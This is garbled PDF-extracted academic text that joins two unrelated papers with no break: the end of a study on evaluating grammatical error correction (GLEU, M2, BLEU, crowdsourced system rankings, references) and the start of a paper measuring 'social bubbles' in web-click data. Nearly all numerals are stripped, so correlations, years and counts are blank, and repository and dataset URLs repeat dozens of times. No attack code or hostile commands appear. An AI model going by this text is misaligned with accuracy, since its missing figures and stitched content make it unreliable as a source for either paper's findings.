existing metrics and anno- tation sets to evaluate the system outputs made public from the conll shared task. to our knowledge, this is the first time that the interplay of annotation scheme and evaluation metric, as well as the rater expertise, has been evaluated jointly for gec. . experimental setup the four automatic metrics that we investigate are m , i-measure, gleu, and bleu. we include the machine-translation metric bleu because evaluat- ing against our new non-coded annotations is similar to machine-translation evaluation, which considers overlap instead of absolute alignment between the output and reference sentences. for the m and i-measure evaluations, we aligned the fluency and minimal edits to the original sen- tences using a levenshtein edit distance algorithm. neither metric makes use of the annotation labels, so we simply assigned dummy error codes. our gleu implementation differs from that of napoles et al. ( ). we use a simpler, modified version: precision is the number of candidate (c) n-grams that match the reference (r) n-grams, mi- nus the counts of n-grams found more often in the source (s) than the reference (equation ). because the number of possible reference n-grams increases as more reference sets are used, we calculate an in- termediate gleu by drawing a random sample from one of the references and report the mean score over iterations. we compare the system outputs to each of the six annotation sets and a seventh set containing all of the annotations, using each metric. we ranked the systems based on their scores using each metric– annotation-set pair, and thus generated a total of different rankings ( metrics × annotation sets). to determine the best metric, we compared the system-level ranking obtained from each evaluation technique against the expert human ranking reported in grundkiewicz et al. ( ), table c. we ran i-measure with the -nomix flag, preventing the al- gorithm from finding the optimal alignment across all possible edits. alignment was very memory-intensive and time consum- ing, even when skipping long sentences. costs for insertion, deletion, and substitution are set to , allowing partial match (e.g. same lemma). running all iterations, it takes less than seconds to eval- uate , sentences. p∗n = ( ∑ ngram∈{c∩r} countc,r(ngram)− ∑ ngram∈{c∩s} max [ , countc,s(ngram)− countc,r(ngram)] ) ∑ ngram∈{c} count(ngram) counta,b(ngram) = min (# occurrences of ngram in a, # occurrences of ngram in b) ( ) m gleu i-measure bleu . . . . . . . . nucle ( ) bn ( ) e-fluency ( ) n-fluency ( ) e-minimal ( ) n-minimal ( ) all ( ) figure : correlation of the human ranking with metric scores over different reference sets (spearman’s ρ). the number of annotations per sentence in each set is in parentheses. see table for the numeric values. m gleu i-measure bleu nucle . . - . - . . * . - . - . bn . . - . - . * . . - . - . e-fluency . . * - . - . . . * - . - . * n-fluency . . - . - . . . - . - . e-min. . * . - . - . . . - . - . n-min. . - . - . - . . - . - . - . all . . - . * - . . . . * - . table : correlation between the human ranking and metric scores over different reference sets. the first line of each cell is spearman’s ρ and the second line is pear- son’s r. the strongest correlations for each metric are starred, and the overall strongest correlations are in bold. . results figure and table show the correlation of the expert rankings with all of the evaluation configu- rations. for the leading metrics, m and gleu, the expert annotations had stronger positive corre- lations than the non-expert annotations. using just two expert fluency annotations with gleu has the strongest correlation with the human ranking out of all other metric–reference pairings (ρ = . , r = . ), and it is additionally cheaper and faster to collect. e-fluency is the third-best reference set with m , which does better with minimal changes: the reference sets with the strongest correlations for m are e-minimal (ρ = . ) and nucle (r = . ). even though the non-expert fluency edits had more changes than the expert fluency edits, they still did reasonably well using both m and gleu. the gleu metric has strongest correlation when comparing against the e-fluency, bn , e-minimal, and “all” reference sets. one could argue that, ex- cept for e-minimal, these references all have greater diversity of edits than nucle and minimal edits. although bn has fewer changes made per sen- tence than the fluency edits, because of the number of annotators, the total pool of n-grams seen per sen- tence increases. e-minimal edits also have strong correlation, suggesting there may be a trade-off be- tween quantity and quality of references. a larger number of references could improve per- formance for gleu. because fluency edits tend to have more variations than error-coded minimal-edit annotations, it is not obvious how many fluency ed- its are necessary to cover the full range of possible corrections. to address this question, we ran an ad- ditional small-scale experiment, where we collected non-expert fluency edits for sentences and computed the average gleu scores of the submit- ted systems against an increasing number of these fluency references. the result (figure ) shows that the gleu score with more fluency references, but the effect starts to level off when there are at least references, suggesting that references cover the majority of possible changes. a similar pattern was observed by bryant and ng ( ) in error-coded annotations with the m metric. the reference sets against which m has the strongest correlation are nucle, expert fluency, and expert minimal edits. even non-expert fluency annotations result in a stronger correlation with the human metric than bn . these findings support the use of fluency edits even with a metric designed for error-coded corpora. one notable difference between m and gleu is their relative performance using non-expert mini- mal edits as a metric. m is robust to the non-expert minimal edits and, as a reference set, this achieves the second strongest spearman’s correlation for this metric. however, pairing the non-expert minimal edits with gleu results in slightly negative correla- tion. this is an unexpected result, as there is sizable overlap between the non-expert and expert minimal edits (table ). we speculate that this difference may be due to the quality of the non-expert minimal edits. recall that humans perceived these sentences to be worse than the other annotations, and better only than the original sentence (table ). i-measure and bleu are shown to be unfavorable for this task, having negative correlation with the hu- man ranking, which supports the findings of napoles et al. ( ) and grundkiewicz et al. ( ). even though bleu and gleu are both based on the n- gram overlap between the hypothesis and original sentences, gleu has strong positive correlations with human rankings while bleu has a moderate negative correlation. the advantage of gleu is that it penalizes n-grams in the system output that were present in the input sentence and absent from the reference. in other words, a system loses credit for missing n-grams that should have been changed. bleu has no such penalty and instead only rewards n-grams that occur in the references and the output, which is a problem in same-language text rewriting camb post cuui amu pku rac umc sjtu nthu ufc iitb ipn input amu camb rac cuui post pku umc ufc iitb input sjtu nthu ipn expert gleu e-fluency figure : system rankings produced by gleu with ex- pert fluency (e-fluency) as the reference compared to the expert human ranking. figure : mean gleu scores with different numbers of fluency references. the red line corresponds to the aver- age gleu score of the gec systems and the vertical bars show the maximum and minimum gleu scores. tasks where there is significant overlap between the reference and the original sentences. for this data, bleu assigns a higher score to the original sen- tences than to any of the systems. figure shows the system ranking for the most strongly correlated annotation–evaluation combi- nation (gleu with e-fluency) compared to the “ground truth” human rankings. the automatic met- ric clusters the systems into the correct upper and lower halves, and the input is correctly placed in the lower half of the rankings. of course, it could be that the input sentences are the best, but the human ranking in figure suggests otherwise. even though automatic metrics strongly correlate with human judgments, they still do not have the same reliability as manual evaluation. like error- coded annotations, judgment by specialists is expen- sive, so we investigate a more practical alternative in the following section. human evaluation automatic metrics are only a proxy for human judg- ments, which are crucial to truthfully ascertain the quality of systems. even the best result in section . , which is state of the art and has very strong rank correlation (ρ = . ) with the expert rank- ing, makes dramatic errors in the system ranking. given the inherent imperfection of automatic eval- uation (and possible over-optimization to the nu- cle data set), we recommend that human evalua- tion be produced alongside metric scores whenever possible. however, human judgments can be ex- pensive to obtain. crowdsourcing may address this problem and has been shown to yield reasonably good judgments for several error types at a relatively low cost (tetreault et al., ). therefore, we ap- ply crowdsourcing to sentence-level grammaticality judgments, by replicating previous experiments that reported expert rankings of system output (napoles et al., ; grundkiewicz et al., ) using non- experts on mturk. . experimental setup using the same data set as those experiments and the work described in this paper, we asked screened participants on mturk to rank five randomly se- lected systems and nucle corrections from best to worst, with ties allowed. sentences were ran- domly selected for evaluation from the nucle sub- section used in grundkiewicz et al. ( ), and the output for each sentence was ranked by two different participants. the system rankings yield , pairwise judgments, from which we inferred the ab- solute system ranking using trueskill. . results figure compares the system ranking by non- experts to the same expert ranking used in sec- participants in the united states with a hit approval rate ≥ % had to pass a sample ranking task graded by the authors. amu camb cuui post rac umc iitb pku input ufc sjtu ipn nthu amu camb rac cuui post pku umc ufc iitb input sjtu nthu ipn expert non-expert figure : output of system rankings by experts and non- experts, from best to worst. dotted lines indicate clusters according to bootstrap resampling (p ≤ . ). judges κ κw non-experts . . experts . . non-experts and experts . . table : inter-annotator agreement of pairwise system judgments within non-experts, experts and between them. we show cohen’s κ and quadratic-weighted κ. tion . . the rankings have very strong correla- tion (ρ = . , r = . ), indicating that non- expert grammaticality judgments are comparably as reliable as those by experts. compared to the best metric ranking shown in figure , the non-expert ranking appears significantly better. no system has a rank more than two away from the expert rank, while gleu has six systems with ranks that are three away. the non-expert correlation can be seen as an upper bound for the task, which is approached but not yet attained by automatic metrics. systems in the same cluster, indicated by dotted lines in figure , can be viewed as ties. from this perspective the expert and non-expert rankings are virtually identical. in addition, experts and non- experts have similar inter-annotator agreement in their pairwise system judgments (table ). the agreement between experts and non-experts is lower than the agreement between just experts or just non- in addition to cohen’s κ, we report weighted κ because a > b and a < b should have less agreement than a > b and a = b. experts, which may be due to the difference of these experimental settings for experts (grundkiewicz et al., ) and for non-experts (this work). however, this finding is not overly concerning since the corre- lation between the rankings is so strong. in all, judgments cost approximately $ ($ . per sentence) and took a total of hours to com- plete. because the non-expert ranking very strongly correlates to the expert ranking and non-experts have similar iaa as experts, we conclude that ex- pensive expert judgments can be replaced by non- experts, when those annotators have been appropri- ately screened. conclusion there is a real distinction between technical gram- maticality and fluency. fluency is a level of mastery that goes beyond knowledge of how to follow the rules, and includes knowing when they can be bro- ken or flouted. language learners—who are a prime constituency motivating the gec task—ultimately care about the latter. but crucially, the current ap- proach of collecting error-coded annotations places downward pressure on annotators to minimize edits in order to neatly label them. this results in anno- tations that are less fluent, and therefore less use- ful, than they should be. we have demonstrated this with the collection of both minimally-edited and flu- ent rewrites of a common test set (section . ); the preference for fluent rewrites over minimal edits is clear (table ). to correct this, the annotations and associated metrics used to score automated gec systems should be brought more in line with this broad- ened goal. we advocate for the collection of flu- ent sentence-level rewrites of ungrammatical sen- tences, which is cheaper than error-coded annota- tions and provides annotators with the freedom to produce fluent edits. in the realm of automatic met- rics, we found that a modified form of gleu com- puted against expert fluency rewrites correlates best with a human ranking of the systems; a close runner- up collects the rewrites from non-experts instead of experts. finally, to stimulate metric development, we found that we were able to produce a new human ranking of systems using non-expert judges. these judges produced a ranking that was highly corre- lated with the expert ranking produced in earlier work (grundkiewicz et al., ). the implication is further reduced costs in producing a gold-standard ranking for new sets of system outputs against both existing and new corpora. as a result, we make the following recommenda- tions: • gec should be evaluated against – whole- sentence rewrites, which can be obtained by non-experts. • automatic metrics that rely on error coding are not necessary, depending on the use case. of the automatic metrics that have been pro- posed, we found that a modified form of gleu (napoles et al., ) is the best-correlated. • the field of gec is in danger from over- reliance on a single annotated corpus (nu- cle). new corpora should be produced in a regular fashion, similar to the workshop on statistical machine translation. fortunately, collecting annotations in the form of unannotated sentence-level rewrites is much cheaper than error-coding, facilitating these practices. by framing grammatical error correction as flu- ency, we can reduce the cost of annotation while cre- ating a more reliable gold standard. we have clearly laid improved practices for annotation and evalua- tion, demonstrating that better quality results can be achieved for less cost using fluency edits instead of error coding. all of the source code and data, in- cluding templates for data collection, will be pub- licly available, which we believe is crucial for sup- porting the improvement of gec in the long term. acknowledgments we would like to thank christopher bryant, mariano felice, roman grundkiewicz and marcin junczys- dowmunt for providing data and code. we would also like to thank the tacl editor, chris quirk, and the three anonymous reviewers for their comments and feedback. this material is based upon work partially supported by the national science founda- tion graduate research fellowship under grant no. . references ondrej bojar, christian buck, christian federmann, barry haddow, philipp koehn, johannes leveling, christof monz, pavel pecina, matt post, herve saint- amand, radu soricut, lucia specia, and aleš tam- chyna. . findings of the workshop on sta- tistical machine translation. in proceedings of the ninth workshop on statistical machine translation, pages – , baltimore, maryland, usa, june. as- sociation for computational linguistics. ondřej bojar, rajen chatterjee, christian federmann, barry haddow, matthias huck, chris hokamp, philipp koehn, varvara logacheva, christof monz, matteo negri, matt post, carolina scarton, lucia specia, and marco turchi. . findings of the workshop on statistical machine translation. in proceedings of the tenth workshop on statistical machine transla- tion, pages – , lisbon, portugal, september. asso- ciation for computational linguistics. christopher bryant and hwee tou ng. . how far are we from fully automatic high quality grammatical error correction? in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. martin chodorow and claudia leacock. . an unsu- pervised method for detecting grammatical errors. in proceedings of the conference of the north american chapter of the association of computational linguis- tics (naacl), pages – . martin chodorow, markus dickinson, ross israel, and joel tetreault. . problems in evaluating gram- matical error detection systems. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. daniel dahlmeier and hwee tou ng. . better evaluation for grammatical error correction. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. daniel dahlmeier, hwee tou ng, and siew mei wu. . building a large annotated corpus of learner en- glish: the nus corpus of learner english. in pro- ceedings of the eighth workshop on innovative use of nlp for building educational applications, pages – , atlanta, georgia, june. association for com- putational linguistics. robert dale and adam kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the generation challenges session at the th eu- ropean workshop on natural language generation, pages – , nancy, france, september. associa- tion for computational linguistics. robert dale, ilya anisimoff, and george narroway. . hoo : a report on the preposition and determiner error correction shared task. in proceed- ings of the seventh workshop on building educational applications using nlp, pages – , montréal, canada, june. association for computational linguis- tics. mariano felice and ted briscoe. . towards a stan- dard evaluation method for grammatical error detec- tion and correction. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics, denver, co, june. association for computational linguistics. roman grundkiewicz, marcin junczys-dowmunt, and edward gillian. . human evaluation of gram- matical error correction systems. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portu- gal, september. association for computational lin- guistics. ralf herbrich, tom minka, and thore graepel. . trueskilltm: a bayesian skill rating system. in proceedings of the twentieth annual conference on neural information processing systems, pages – , vancouver, british columbia, canada, decem- ber. mit press. philipp koehn. . simulating human judgment in machine translation evaluation campaigns. proceed- ings iwslt . c. leacock, m. chodorow, m. gamon, and j. tetreault. . automated grammatical error detection for language learners, second edition. synthesis lec- tures on human language technologies. morgan & claypool publishers. nitin madnani, martin chodorow, joel tetreault, and alla rozovskaya. . they can help: using crowd- sourcing to improve the evaluation of grammatical er- ror detection systems. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics. andrew mutton, mark dras, stephen wan, and robert dale. . gleu: automatic evaluation of sentence- level fluency. in proceedings of the th annual meet- ing of the association of computational linguistics, pages – , prague, czech republic, june. asso- ciation for computational linguistics. courtney napoles, keisuke sakaguchi, matt post, and joel tetreault. . ground truth for grammatical error correction metrics. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : short pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. hwee tou ng, siew mei wu, yuanbin wu, christian hadiwinoto, and joel tetreault. . the conll- shared task on grammatical error correction. in proceedings of the seventeenth conference on com- putational natural language learning: shared task, pages – , sofia, bulgaria, august. association for computational linguistics. hwee tou ng, siew mei wu, ted briscoe, christian hadiwinoto, raymond hendy susanto, and christo- pher bryant. . the conll- shared task on grammatical error correction. in proceedings of the eighteenth conference on computational natural language learning: shared task, pages – , balti- more, maryland, june. association for computational linguistics. diane nicholls. . the cambridge learner corpus: error coding and analysis for lexicography and elt. in proceedings of the corpus linguistics confer- ence, pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in proceedings of th annual meeting of the association for computational linguistics, pages – , philadelphia, pennsylva- nia, usa, july. association for computational lin- guistics. ellie pavlick, rui yan, and chris callison-burch. . crowdsourcing for grammatical error correction. in proceedings of the companion publication of the th acm conference on computer supported cooperative work & social computing, pages – . acm. alla rozovskaya and dan roth. . annotating esl errors: challenges and rewards. in proceedings of the naacl hlt fifth workshop on innovative use of nlp for building educational applications, pages – , los angeles, california, june. association for computational linguistics. alla rozovskaya and dan roth. . building a state- of-the-art grammatical error correction system. trans- actions of the association for computational linguis- tics, : – . keisuke sakaguchi, matt post, and benjamin van durme. . efficient elicitation of anno- tations for human evaluation of machine translation. in proceedings of the ninth workshop on statisti- cal machine translation, pages – , baltimore, maryland, usa, june. association for computational linguistics. matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of association for machine translation in the americas, pages – . ben swanson and elif yamangil. . correction de- tection and error type selection as an esl educational aid. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , montréal, canada, june. asso- ciation for computational linguistics. joel tetreault and martin chodorow. . native judg- ments of non-native usage: experiments in preposi- tion error detection. in coling : proceedings of the workshop on human judgements in computational linguistics, pages – , manchester, uk, august. coling organizing committee. joel tetreault, elena filatova, and martin chodorow. . rethinking grammatical error annotation and evaluation with the amazon mechanical turk. in proceedings of the naacl hlt fifth workshop on innovative use of nlp for building educational applications, pages – , los angeles, california, june. association for computational linguistics. joel tetreault, martin chodorow, and nitin madnani. . bucking the trend: improved evaluation and annotation practices for esl error detection systems. language resources and evaluation, ( ): – . huichao xue and rebecca hwa. . improved correc- tion detection in revised esl sentences. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, june. associa- tion for computational linguistics. helen yannakoudakis, ted briscoe, and ben medlock. . a new dataset and method for automatically grading esol texts. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics. measuring online social bubbles submitted august accepted november published december corresponding author dimitar nikolov, dnikolov@indiana.edu academic editor mark wilson additional information and declarations can be found on page doi . /peerj-cs. copyright nikolov et al. distributed under creative commons cc-by . open access measuring online social bubbles dimitar nikolov, diego f.m. oliveira, alessandro flammini and filippo menczer center for complex networks and systems research, indiana university, bloomington, in, united states abstract social media have become a prevalent channel to access information, spread ideas, and influence opinions. however, it has been suggested that social and algorithmic filtering may cause exposure to less diverse points of view. here we quantitatively measure this kind of social bias at the collective level by mining a massive datasets of web clicks. our analysis shows that collectively, people access information from a significantly narrower spectrum of sources through social media and email, compared to a search baseline. the significance of this finding for individual exposure is revealed by investigating the relationship between the diversity of information sources experienced by users at both the collective and individual levels in two datasets where individual users can be analyzed—twitter posts and search logs. there is a strong correlation between collective and individual diversity, supporting the notion that when we use social media we find ourselves inside “social bubbles.” our results could lead to a deeper understanding of how technology biases our exposure to new information. subjects network science and online social networks, social computing, world wide web and web science keywords bias, diversity, polarization, filter bubble, echo chamber, web traffic introduction the rapid adoption of the web as a source of knowledge and a social space has made it ever more difficult for people to manage the constant stream of news and information arriving on their screens. content providers and users have responded to this problem by adopting a wide range of tools and behaviors that filter and/or rank items in the information stream. one important result of this process has been higher personalization (mobasher, cooley & srivastava, )—people see more content tailored specifically to them based on their past behaviors or social networks. recommendation systems (ricci et al., ), for example, suggest items in which one is more likely to be interested based on previous purchases, past actions of similar users, or other criteria based on one’s past behavior and friends. search engines provide personalized results as well, based on browsing histories and social connections (google, b; google, a). it is common for users themselves to adopt filters in their online behavior, whether they do this consciously or not. for example, on social platforms such as facebook, a large portion of users are exposed to news shared by their friends (bakshy et al., ; matsa & mitchell, ). because of the limited time and attention people possess and the large popularity of online social networks, the discovery of information is being transformed how to cite this article nikolov et al. ( ), measuring online social bubbles. peerj comput. sci. :e ; doi . /peerj-cs. mailto:dnikolov@indiana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. from an individual to a social endeavor. while the tendency to selectively expose ourselves to the opinion of like-minded people was present in the pre-digital world (hart et al., ; kastenmüller et al., ), the ease with which we can find, follow, and focus on such people and exclude others in the online world may enhance this tendency. regardless of whether biases in information exposure are stronger today versus in the pre-digital era, the traces of online behavior provide a valuable opportunity to quantify such biases. while useful, personalization filters—whether they are algorithmic, social, a combi- nation of both, and whether they are used with or without user awareness—have biases that affect our access to information in important ways. in one line of reasoning, sunstein ( ), sunstein ( ) and pariser ( ) have argued that the reliance on personalization and social media can lead people to being exposed to a narrow set of viewpoints. according to this hypothesis, one’s existing beliefs are reinforced because they are locked inside so-called “filter bubbles” or “echo chambers,” which prevent one from engaging with ideas different from their own. such selective exposure could facilitate confirmation bias (baron, ; nickerson, ) and possibly create a fertile ground for polarization and misinformed opinions (nyhan & reifler, ; mckenzie, ; stanovich, west & toplak, ; silverman, ). these concerns are borne out to varying degrees in online user behavior data. for exam- ple, on facebook, three filters—the social network, the feed population algorithm, and a user’s own content selection—combine to decrease exposure to ideologically challenging news from a random baseline by more than % for conservative users, and close to % for liberal users (bakshy, messing & adamic, ). the same study however highlights the difficulty in interpreting measurements of diverse information exposure. the decrease in exposure is significant, but the random baseline represents a completely bias-free exposure, which may not occur in reality. our exposure is biased both in our explicit choices of information sources and implicitly through homophily—our tendency to associate with like-minded friends. each social media filter may mitigate or amplify these biases. the combination of filters on facebook still allows for exposure to some ideologically challenging news. but how does this compare to other ways of discovering information? in a different facebook study, users, especially partisan ones, were more likely to share articles with which they agree (an et al., ). similar patterns can be seen on other plat- forms. on blogs, commenters are several times more likely to agree with each other than not (gilbert, bergstrom & karahalios, ), and liberals and conservatives primarily link within their own communities (adamic & glance, ). on twitter, political polarization is even more evident (conover et al., ; conover et al., ). when browsing news, people are more likely to be exposed to like-minded opinion pieces (flaxman, goel & rao, ), and to stay connected and share articles with others having similar interests and values (grevet, terveen & gilbert, ). in the context of controversial events that are highly polarizing, web sources tend to be partial and unbalanced, and only a small fraction of online readers visit more than two different sources (koutra, bennett & horvitz, ). to respond to such narrowing of online horizons, researchers have started to concentrate nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. on more engaging presentation of disagreeable content (doris-down, versee & gilbert, ; munson & resnick, ; graells-garrido, lalmas & quercia, ). in domains outside of political discourse there is less evidence that personalization and social networks lead to filter bubbles. recommendation systems have a diversifying effect on purchases (hosanagar et al., ), and search engines have had a democratizing effect on the discovery of information, despite the popularity-based signals used in their ranking algorithms (fortunato et al., ). aspects of the filter bubble hypothesis have so far been quantified for specific platforms like blogs (adamic & glance, ), facebook (bakshy, messing & adamic, ), and twitter (conover et al., ), but not across different classes of information sources. indeed, social media and blogs could be very different from other types of sites, because of the strong social influence in them. what these differences may be and how they affect information consumption is an open question. for example, on the one hand, one would imagine homophily to contribute to the formation of echo chambers in social networks. on the other hand, the abundance of weak ties between individuals in different communities (bakshy et al., ) could lead to highly diverse exposure. in this study we look at the diversity of information exposure more broadly. our goal is to examine biases inherent in different types of online activity: information search, one-to-one communication from email exchanges, and many-to-many communication captured from social media streams. how large is the diversity of information sources to which we are exposed through interpersonal communication channels, such as social media and email, compared to a baseline of information seeking? we answer this question at the collective level by analyzing a massive dataset of web clicks. in addition, we investigate how this analysis relates to the diversity of information accessed by individual users through an analysis of two additional datasets—twitter posts and search logs. figure illustrates our empirical analysis: we measure how the visits by people that are engaged in different types of online activities are distributed across a broad set of websites (figs. a and c) or concentrated within a few (figs. b and d). we carry out our analyses on all web targets as well as on targets restricted to news sites. the latter are of particular relevance when examining bias in public discourse. we do not make any additional distinctions regarding the type of content people visit, such as opinion pieces versus reporting, or differing ideological slant. we do not consider beliefs, past behaviors, or specific interests of information consumers. these deliberate choices are designed to yield quantitative measures of bias that do not depend on subjective assessments. our results are therefore general and applicable to different topics, geographical regions, interests, and media sources. methods to study the diversity of information exposure we use a massive collection of web clicks as our primary dataset, and two supplementary datasets of link shares on twitter and aol search clicks. code is available to reproduce our entire data processing procedure, described next (https://github.com/dimitargnikolov/web-traffic-iu). nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu http://dx.doi.org/ . /peerj-cs. figure diversity of information sources accessed through different online channels. each circle represents a unique website, and its area is proportional to the number of pages accessed on that website. (a) links clicked by a single search engine user. (b) links shared by a single twitter user. (c) search traffic generated by a collection of users. (d) social media traffic generated by a collection of users. in each case, a random sample of links was taken for a period of one week. these examples illustrate typical behaviors gleaned from our data. on the left we see more heterogeneous patterns with search traffic distributed more evenly among several sources (higher shannon entropy ha = . and hc = . ). the patterns on the right are more homogeneous, with fewer sources dominating most social traffic (lower entropy hb = . and hd = . ). click dataset the click data we use comes from a publicly available dataset collected at the edge of the indiana university network (meiss et al., ), which allows us to obtain a trace of web requests (http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/). each request record has a target page, a referrer (source) page, and a timestamp. privacy concerns prevent any identifying information about individual users or clients from being collected, making it impossible to associate any request with any particular computer or person. we only use the traffic coming from self-identified browsers to filter out search engine crawlers and other bots. the data only includes traffic originating inside the indiana university network and requesting external pages. this collection draws from a diverse population of over thousand people, and spans a period of months between october and may . since in the click data it is not possible to distinguish with full certainty requests result- ing from human clicks and requests auto-generated by the pages, we filter out any requests for files other than web pages, such as javascript, images, video, and so on based on the file extension. this results in the shrinking of the dataset by a factor of . since the file exten- sion is not always present in the url, this method is not guaranteed to remove all non- human click data. however, it provides a good first approximation of human clicks, and we further address this issue with additional data filtering described later in this section. once non-human traffic is removed from the dataset based on file extensions, the path in the url is discarded and the resulting clicks are only identified by the referrer and nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ 